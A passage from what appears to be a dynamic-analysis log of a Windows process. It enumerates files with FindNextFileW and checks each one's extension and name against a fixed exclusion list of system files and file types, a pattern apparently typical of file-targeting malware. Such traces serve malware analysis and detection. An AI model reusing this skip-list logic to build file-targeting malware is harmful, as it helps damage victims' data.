cchCount2=3) returned 1 [0058.627] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="CHT", cchCount2=3) returned 3 [0058.627] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="CHT", cchCount2=3) returned 3 [0058.627] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="CHT", cchCount2=3) returned 1 [0058.627] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="CHT", cchCount2=3) returned 3 [0058.627] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="CHT", cchCount2=3) returned 3 [0058.627] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="CHT", cchCount2=3) returned 3 [0058.627] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="CHT", cchCount2=3) returned 3 [0058.627] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="CHT", cchCount2=3) returned 3 [0058.627] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BLF", cchCount1=3, lpString2="CHT", cchCount2=3) returned 1 [0058.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RBS", cchCount1=3, lpString2="CHT", cchCount2=3) returned 3 [0058.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REGTRANS-MS", cchCount1=11, lpString2="CHT", cchCount2=3) returned 3 [0058.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SETTINGCONTENT-MS", cchCount1=17, lpString2="CHT", cchCount2=3) returned 3 [0058.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEARCH-MS", cchCount1=9, lpString2="CHT", cchCount2=3) returned 3 [0058.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="CHT", cchCount2=3) returned 3 [0058.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="CHT", cchCount2=3) returned 3 [0058.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG1", cchCount1=4, lpString2="CHT", cchCount2=3) returned 3 [0058.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG2", cchCount1=4, lpString2="CHT", cchCount2=3) returned 3 [0058.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT", cchCount1=10, lpString2="ACROFORM.CHT", cchCount2=12) returned 3 [0058.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.POL", cchCount1=10, lpString2="ACROFORM.CHT", cchCount2=12) returned 3 [0058.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG", cchCount1=14, lpString2="ACROFORM.CHT", cchCount2=12) returned 3 [0058.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG1", cchCount1=15, lpString2="ACROFORM.CHT", cchCount2=12) returned 3 [0058.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG2", cchCount1=15, lpString2="ACROFORM.CHT", cchCount2=12) returned 3 [0058.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICONCACHE.DB", cchCount1=12, lpString2="ACROFORM.CHT", cchCount2=12) returned 3 [0058.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="THUMBS.DB", cchCount1=9, lpString2="ACROFORM.CHT", cchCount2=12) returned 3 [0058.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTSECT.BAK", cchCount1=12, lpString2="ACROFORM.CHT", cchCount2=12) returned 3 [0058.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTMGR", cchCount1=7, lpString2="ACROFORM.CHT", cchCount2=12) returned 3 [0058.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEFAULT.RDP", cchCount1=11, lpString2="ACROFORM.CHT", cchCount2=12) returned 3 [0058.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PAGEFILE.SYS", cchCount1=12, lpString2="ACROFORM.CHT", cchCount2=12) returned 3 [0058.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HIBERFIL.SYS", cchCount1=12, lpString2="ACROFORM.CHT", cchCount2=12) returned 3 [0058.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SWAPFILE.SYS", cchCount1=12, lpString2="ACROFORM.CHT", cchCount2=12) returned 3 [0058.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WORDPAD.EXE", cchCount1=11, lpString2="ACROFORM.CHT", cchCount2=12) returned 3 [0058.628] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x8039ef40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x1800, dwReserved0=0x0, dwReserved1=0x0, cFileName="AdobeCollabSync.CHT", cAlternateFileName="ADOBEC~1.CHT")) returned 1 [0058.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BG85", cchCount1=4, lpString2="CHT", cchCount2=3) returned 1 [0058.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="CHT", cchCount2=3) returned 3 [0058.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="CHT", cchCount2=3) returned 3 [0058.629] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="CHT", cchCount2=3) returned 1 [0058.629] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="CHT", cchCount2=3) returned 3 [0058.629] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="CHT", cchCount2=3) returned 3 [0058.629] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="CHT", cchCount2=3) returned 3 [0058.629] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="CHT", cchCount2=3) returned 3 [0058.629] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="CHT", cchCount2=3) returned 3 [0058.629] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BLF", cchCount1=3, lpString2="CHT", cchCount2=3) returned 1 [0058.629] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RBS", cchCount1=3, lpString2="CHT", cchCount2=3) returned 3 [0058.629] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REGTRANS-MS", cchCount1=11, lpString2="CHT", cchCount2=3) returned 3 [0058.629] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SETTINGCONTENT-MS", cchCount1=17, lpString2="CHT", cchCount2=3) returned 3 [0058.629] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEARCH-MS", cchCount1=9, lpString2="CHT", cchCount2=3) returned 3 [0058.629] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="CHT", cchCount2=3) returned 3 [0058.629] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="CHT", cchCount2=3) returned 3 [0058.629] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG1", cchCount1=4, lpString2="CHT", cchCount2=3) returned 3 [0058.629] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG2", cchCount1=4, lpString2="CHT", cchCount2=3) returned 3 [0058.629] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT", cchCount1=10, lpString2="ADOBECOLLABSYNC.CHT", cchCount2=19) returned 3 [0058.629] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.POL", cchCount1=10, lpString2="ADOBECOLLABSYNC.CHT", cchCount2=19) returned 3 [0058.629] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG", cchCount1=14, lpString2="ADOBECOLLABSYNC.CHT", cchCount2=19) returned 3 [0058.629] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG1", cchCount1=15, lpString2="ADOBECOLLABSYNC.CHT", cchCount2=19) returned 3 [0058.629] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG2", cchCount1=15, lpString2="ADOBECOLLABSYNC.CHT", cchCount2=19) returned 3 [0058.629] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICONCACHE.DB", cchCount1=12, lpString2="ADOBECOLLABSYNC.CHT", cchCount2=19) returned 3 [0058.629] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="THUMBS.DB", cchCount1=9, lpString2="ADOBECOLLABSYNC.CHT", cchCount2=19) returned 3 [0058.629] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTSECT.BAK", cchCount1=12, lpString2="ADOBECOLLABSYNC.CHT", cchCount2=19) returned 3 [0058.629] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTMGR", cchCount1=7, lpString2="ADOBECOLLABSYNC.CHT", cchCount2=19) returned 3 [0058.629] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEFAULT.RDP", cchCount1=11, lpString2="ADOBECOLLABSYNC.CHT", cchCount2=19) returned 3 [0058.630] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PAGEFILE.SYS", cchCount1=12, lpString2="ADOBECOLLABSYNC.CHT", cchCount2=19) returned 3 [0058.630] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HIBERFIL.SYS", cchCount1=12, lpString2="ADOBECOLLABSYNC.CHT", cchCount2=19) returned 3 [0058.630] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SWAPFILE.SYS", cchCount1=12, lpString2="ADOBECOLLABSYNC.CHT", cchCount2=19) returned 3 [0058.630] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WORDPAD.EXE", cchCount1=11, lpString2="ADOBECOLLABSYNC.CHT", cchCount2=19) returned 3 [0058.630] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82e05720, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4c600, dwReserved0=0x0, dwReserved1=0x0, cFileName="Annots.CHT", cAlternateFileName="")) returned 1 [0058.630] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BG85", cchCount1=4, lpString2="CHT", cchCount2=3) returned 1 [0058.630] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="CHT", cchCount2=3) returned 3 [0058.630] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="CHT", cchCount2=3) returned 3 [0058.630] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="CHT", cchCount2=3) returned 1 [0058.630] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="CHT", cchCount2=3) returned 3 [0058.630] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="CHT", cchCount2=3) returned 3 [0058.630] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="CHT", cchCount2=3) returned 3 [0058.630] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="CHT", cchCount2=3) returned 3 [0058.630] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="CHT", cchCount2=3) returned 3 [0058.630] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BLF", cchCount1=3, lpString2="CHT", cchCount2=3) returned 1 [0058.630] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RBS", cchCount1=3, lpString2="CHT", cchCount2=3) returned 3 [0058.630] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REGTRANS-MS", cchCount1=11, lpString2="CHT", cchCount2=3) returned 3 [0058.630] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SETTINGCONTENT-MS", cchCount1=17, lpString2="CHT", cchCount2=3) returned 3 [0058.630] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEARCH-MS", cchCount1=9, lpString2="CHT", cchCount2=3) returned 3 [0058.630] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="CHT", cchCount2=3) returned 3 [0058.630] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="CHT", cchCount2=3) returned 3 [0058.630] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG1", cchCount1=4, lpString2="CHT", cchCount2=3) returned 3 [0058.630] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG2", cchCount1=4, lpString2="CHT", cchCount2=3) returned 3 [0058.631] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT", cchCount1=10, lpString2="ANNOTS.CHT", cchCount2=10) returned 3 [0058.631] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.POL", cchCount1=10, lpString2="ANNOTS.CHT", cchCount2=10) returned 3 [0058.631] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG", cchCount1=14, lpString2="ANNOTS.CHT", cchCount2=10) returned 3 [0058.631] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG1", cchCount1=15, lpString2="ANNOTS.CHT", cchCount2=10) returned 3 [0058.631] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG2", cchCount1=15, lpString2="ANNOTS.CHT", cchCount2=10) returned 3 [0058.631] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICONCACHE.DB", cchCount1=12, lpString2="ANNOTS.CHT", cchCount2=10) returned 3 [0058.631] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="THUMBS.DB", cchCount1=9, lpString2="ANNOTS.CHT", cchCount2=10) returned 3 [0058.631] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTSECT.BAK", cchCount1=12, lpString2="ANNOTS.CHT", cchCount2=10) returned 3 [0058.631] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTMGR", cchCount1=7, lpString2="ANNOTS.CHT", cchCount2=10) returned 3 [0058.631] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEFAULT.RDP", cchCount1=11, lpString2="ANNOTS.CHT", cchCount2=10) returned 3 [0058.631] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PAGEFILE.SYS", cchCount1=12, lpString2="ANNOTS.CHT", cchCount2=10) returned 3 [0058.631] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HIBERFIL.SYS", cchCount1=12, lpString2="ANNOTS.CHT", cchCount2=10) returned 3 [0058.631] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SWAPFILE.SYS", cchCount1=12, lpString2="ANNOTS.CHT", cchCount2=10) returned 3 [0058.631] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WORDPAD.EXE", cchCount1=11, lpString2="ANNOTS.CHT", cchCount2=10) returned 3 [0058.631] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x820558a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x1e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="BRdlang32.CHT", cAlternateFileName="BRDLAN~1.CHT")) returned 1 [0058.631] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BG85", cchCount1=4, lpString2="CHT", cchCount2=3) returned 1 [0058.631] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="CHT", cchCount2=3) returned 3 [0058.631] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="CHT", cchCount2=3) returned 3 [0058.631] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="CHT", cchCount2=3) returned 1 [0058.631] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="CHT", cchCount2=3) returned 3 [0058.631] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="CHT", cchCount2=3) returned 3 [0058.631] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="CHT", cchCount2=3) returned 3 [0058.632] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="CHT", cchCount2=3) returned 3 [0058.632] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="CHT", cchCount2=3) returned 3 [0058.632] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BLF", cchCount1=3, lpString2="CHT", cchCount2=3) returned 1 [0058.632] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RBS", cchCount1=3, lpString2="CHT", cchCount2=3) returned 3 [0058.632] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REGTRANS-MS", cchCount1=11, lpString2="CHT", cchCount2=3) returned 3 [0058.632] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SETTINGCONTENT-MS", cchCount1=17, lpString2="CHT", cchCount2=3) returned 3 [0058.632] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEARCH-MS", cchCount1=9, lpString2="CHT", cchCount2=3) returned 3 [0058.632] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="CHT", cchCount2=3) returned 3 [0058.632] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="CHT", cchCount2=3) returned 3 [0058.632] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG1", cchCount1=4, lpString2="CHT", cchCount2=3) returned 3 [0058.632] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG2", cchCount1=4, lpString2="CHT", cchCount2=3) returned 3 [0058.632] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT", cchCount1=10, lpString2="BRDLANG32.CHT", cchCount2=13) returned 3 [0058.632] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.POL", cchCount1=10, lpString2="BRDLANG32.CHT", cchCount2=13) returned 3 [0058.632] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG", cchCount1=14, lpString2="BRDLANG32.CHT", cchCount2=13) returned 3 [0058.632] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG1", cchCount1=15, lpString2="BRDLANG32.CHT", cchCount2=13) returned 3 [0058.632] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG2", cchCount1=15, lpString2="BRDLANG32.CHT", cchCount2=13) returned 3 [0058.632] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICONCACHE.DB", cchCount1=12, lpString2="BRDLANG32.CHT", cchCount2=13) returned 3 [0058.632] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="THUMBS.DB", cchCount1=9, lpString2="BRDLANG32.CHT", cchCount2=13) returned 3 [0058.632] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTSECT.BAK", cchCount1=12, lpString2="BRDLANG32.CHT", cchCount2=13) returned 1 [0058.632] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTMGR", cchCount1=7, lpString2="BRDLANG32.CHT", cchCount2=13) returned 1 [0058.632] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEFAULT.RDP", cchCount1=11, lpString2="BRDLANG32.CHT", cchCount2=13) returned 3 [0058.632] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PAGEFILE.SYS", cchCount1=12, lpString2="BRDLANG32.CHT", cchCount2=13) returned 3 [0058.632] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HIBERFIL.SYS", cchCount1=12, lpString2="BRDLANG32.CHT", cchCount2=13) returned 3 [0058.632] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SWAPFILE.SYS", cchCount1=12, lpString2="BRDLANG32.CHT", cchCount2=13) returned 3 [0058.633] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WORDPAD.EXE", cchCount1=11, lpString2="BRDLANG32.CHT", cchCount2=13) returned 3 [0058.633] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82c62800, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x13200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Checkers.CHT", cAlternateFileName="")) returned 1 [0058.633] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BG85", cchCount1=4, lpString2="CHT", cchCount2=3) returned 1 [0058.633] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="CHT", cchCount2=3) returned 3 [0058.633] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="CHT", cchCount2=3) returned 3 [0058.633] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="CHT", cchCount2=3) returned 1 [0058.633] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="CHT", cchCount2=3) returned 3 [0058.633] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="CHT", cchCount2=3) returned 3 [0058.633] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="CHT", cchCount2=3) returned 3 [0058.633] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="CHT", cchCount2=3) returned 3 [0058.633] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="CHT", cchCount2=3) returned 3 [0058.633] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BLF", cchCount1=3, lpString2="CHT", cchCount2=3) returned 1 [0058.633] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RBS", cchCount1=3, lpString2="CHT", cchCount2=3) returned 3 [0058.633] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REGTRANS-MS", cchCount1=11, lpString2="CHT", cchCount2=3) returned 3 [0058.633] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SETTINGCONTENT-MS", cchCount1=17, lpString2="CHT", cchCount2=3) returned 3 [0058.633] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEARCH-MS", cchCount1=9, lpString2="CHT", cchCount2=3) returned 3 [0058.633] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="CHT", cchCount2=3) returned 3 [0058.633] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="CHT", cchCount2=3) returned 3 [0058.633] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG1", cchCount1=4, lpString2="CHT", cchCount2=3) returned 3 [0058.633] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG2", cchCount1=4, lpString2="CHT", cchCount2=3) returned 3 [0058.633] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT", cchCount1=10, lpString2="CHECKERS.CHT", cchCount2=12) returned 3 [0058.633] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.POL", cchCount1=10, lpString2="CHECKERS.CHT", cchCount2=12) returned 3 [0058.634] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG", cchCount1=14, lpString2="CHECKERS.CHT", cchCount2=12) returned 3 [0058.634] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG1", cchCount1=15, lpString2="CHECKERS.CHT", cchCount2=12) returned 3 [0058.634] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG2", cchCount1=15, lpString2="CHECKERS.CHT", cchCount2=12) returned 3 [0058.634] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICONCACHE.DB", cchCount1=12, lpString2="CHECKERS.CHT", cchCount2=12) returned 3 [0058.634] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="THUMBS.DB", cchCount1=9, lpString2="CHECKERS.CHT", cchCount2=12) returned 3 [0058.634] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTSECT.BAK", cchCount1=12, lpString2="CHECKERS.CHT", cchCount2=12) returned 1 [0058.634] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTMGR", cchCount1=7, lpString2="CHECKERS.CHT", cchCount2=12) returned 1 [0058.634] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEFAULT.RDP", cchCount1=11, lpString2="CHECKERS.CHT", cchCount2=12) returned 3 [0058.634] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PAGEFILE.SYS", cchCount1=12, lpString2="CHECKERS.CHT", cchCount2=12) returned 3 [0058.634] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HIBERFIL.SYS", cchCount1=12, lpString2="CHECKERS.CHT", cchCount2=12) returned 3 [0058.634] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SWAPFILE.SYS", cchCount1=12, lpString2="CHECKERS.CHT", cchCount2=12) returned 3 [0058.634] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WORDPAD.EXE", cchCount1=11, lpString2="CHECKERS.CHT", cchCount2=12) returned 3 [0058.634] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82c62800, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x11e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="DigSig.CHT", cAlternateFileName="")) returned 1 [0058.634] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BG85", cchCount1=4, lpString2="CHT", cchCount2=3) returned 1 [0058.634] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="CHT", cchCount2=3) returned 3 [0058.634] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="CHT", cchCount2=3) returned 3 [0058.634] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="CHT", cchCount2=3) returned 1 [0058.634] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="CHT", cchCount2=3) returned 3 [0058.634] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="CHT", cchCount2=3) returned 3 [0058.634] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="CHT", cchCount2=3) returned 3 [0058.634] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 